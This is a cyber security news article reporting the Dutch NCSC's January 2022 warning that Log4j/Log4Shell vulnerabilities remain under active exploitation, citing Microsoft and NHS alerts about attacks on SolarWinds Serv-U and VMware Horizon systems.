Powered by MOMENTUM MEDIA
cyber daily logo
Breaking news and updates daily. Subscribe to our Newsletter

Lingering Log4j risks still at large, Dutch cyber security agency warns

The Dutch National Cyber Security Centre (NCSC) has warned that organisations should still be aware of risks connected to Log4j attacks and remain vigilant for ongoing threats.

user icon
Tue, 25 Jan 2022
Lingering Log4j risks still at large, Dutch cyber security agency warns
expand image

While many organisations responded quickly after discovering the Log4Shell breach to mitigate critical vulnerabilities as a result of the recent attacks, the NCSC has warned that threat actors are likely still planning to breach new targets.

According to the Dutch cyber security agency, it is expected that malicious parties will continue to search for vulnerable systems and carry out targeted attacks in the coming period.

"It is therefore important to remain vigilant."

============
============

"The NCSC advises organisations to continue to monitor whether vulnerable systems are used and to apply updates or mitigating measures where necessary.

"In addition, the NCSC advises directors to stay alert by informing themselves about Log4j and the possible impact of abuse on business continuity," the Dutch cyber security agency said in a statement.

Log4j vulnerabilities (including Log4Shell) are very appealing attack vectors for both financially motivated and state-backed attackers, given that the open-source Apache Log4j logging library is used in a wide range of systems from dozens of vendors.

Log4Shell, in particular, can be leveraged remotely on servers exposed to local or internet access to allow attackers to move laterally through a network until they reach sensitive internal systems.

After its disclosure, multiple threat actors started deploying Log4Shell exploits, including hacking groups linked to governments in China, Iran, North Korea, and Turkey and access brokers used by ransomware gangs.

Log4j is still under active exploitation

NCSC's warning is well-timed, seeing that multiple alerts of ongoing Log4j exploitation around the world were issued by government and private organisations worldwide.

For instance, a Microsoft report last week stated attempts made by unknown threat actors to propagate Log4j attacks to an organisation's internal LDAP servers by exploiting a SolarWinds Serv-U zero-day.

The attacks failed because the Windows domain controllers targeted in the incident were not vulnerable to Log4j exploits.

One week earlier, Microsoft warned of a Chinese threat actor tracked as DEV-0401 using Log4Shell exploits on internet-exposed VMware Horizon servers to deploy Night Sky ransomware.

"As early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon," Microsoft said.

"Our investigation shows that successful intrusions in these campaigns led to the deployment of the Night Sky ransomware."

Microsoft's reports were preceded by another alert issued by UK's National Health Service (NHS) on 5 January about attackers targeting VMware Horizon systems with Log4Shell exploits.

[Related: 9 key decisions you’ll need to make in the wake of a ransomware attack]

newsletter
cyber daily subscribe
Be the first to hear the latest developments in the cyber industry.